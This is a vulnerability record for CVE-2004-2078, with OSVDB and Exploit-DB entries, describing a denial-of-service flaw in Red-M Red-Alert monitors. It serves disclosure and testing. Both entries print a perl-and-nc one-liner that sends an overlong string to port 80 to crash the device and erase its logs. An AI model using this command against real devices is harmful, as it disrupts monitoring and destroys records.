ID: CVE-2004-2078
Type: cve
Reporter: cve@mitre.org
Modified: 2017-07-11T01:31:00
Description
Red-M Red-Alert 2.7.5 with software 3.1 build 24 allows remote attackers to cause a denial of service (reboot and loss of logged events) via a long request to TCP port 80, possibly triggering a buffer overflow.
{"osvdb": [{"lastseen": "2017-04-28T13:19:58", "bulletinFamily": "software", "cvelist": ["CVE-2004-2078"], "edition": 1, "description": "## Vulnerability Description\nRed-Alert contains a flaw that may allow a remote denial of service. The issue is triggered when a very long string is sent to port 80, and will result in loss of availability for the platform.\n## Solution Description\nCurrently, there are no known workarounds or upgrades to correct this issue. However, Red-M has released a patch to address this vulnerability.\n## Short Description\nRed-Alert contains a flaw that may allow a remote denial of service. The issue is triggered when a very long string is sent to port 80, and will result in loss of availability for the platform.\n## Manual Testing Notes\nperl -e 'print \"a\"x1230 . \"\\r\\n\\r\\n\"| nc <device ip> 80 \n## References:\nVendor URL: http://www.red-m.com/\nVendor URL: http://www.red-m.com\nSecurity Tracker: 1009001\n[Secunia Advisory ID:10832](https://secuniaresearch.flexerasoftware.com/advisories/10832/)\n[Related OSVDB ID: 3953](https://vulners.com/osvdb/OSVDB:3953)\n[Related OSVDB ID: 3952](https://vulners.com/osvdb/OSVDB:3952)\nOther Advisory URL: http://genhex.org/releases/031003.txt\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-02/0233.html\nISS X-Force ID: 15086\n[CVE-2004-2078](https://vulners.com/cve/CVE-2004-2078)\nBugtraq ID: 9618\n", "modified": "2004-02-08T07:08:46", "published": "2004-02-08T07:08:46", "href": "https://vulners.com/osvdb/OSVDB:3891", "id": "OSVDB:3891", "type": "osvdb", "title": "Red-Alert Long String DoS ", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2016-02-02T21:32:14", "description": "Red-M Red-Alert 3.1 Remote Vulnerabilities. CVE-2004-2078. Dos exploit for hardware platform", "published": "2004-02-09T00:00:00", "type": "exploitdb", "title": "Red-M Red-Alert 3.1 - Remote Vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2004-2078"], "modified": "2004-02-09T00:00:00", "id": "EDB-ID:23672", "href": "https://www.exploit-db.com/exploits/23672/", "sourceData": "source: http://www.securityfocus.com/bid/9618/info\r\n\r\nProblems in various abilities have been identified in the Red-M Red-Alert network monitors. Because of this issues, an attacker may be able to crash a vulnerable device and eliminate logs, gain unauthorized access to the administrative interface, or partially evade detection by an affected device.\r\n\r\n$ perl -e 'print \"a\"x1230 . \"\\r\\n\\r\\n\"| nc <device ip> 80", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/23672/"}]}